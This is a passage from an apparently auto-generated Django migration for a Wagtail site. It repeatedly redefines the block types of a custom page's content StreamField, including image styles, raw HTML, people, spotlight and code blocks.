field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock()))))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True)),)))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True)),)))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True)),)))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True)),)))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True)),)))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', 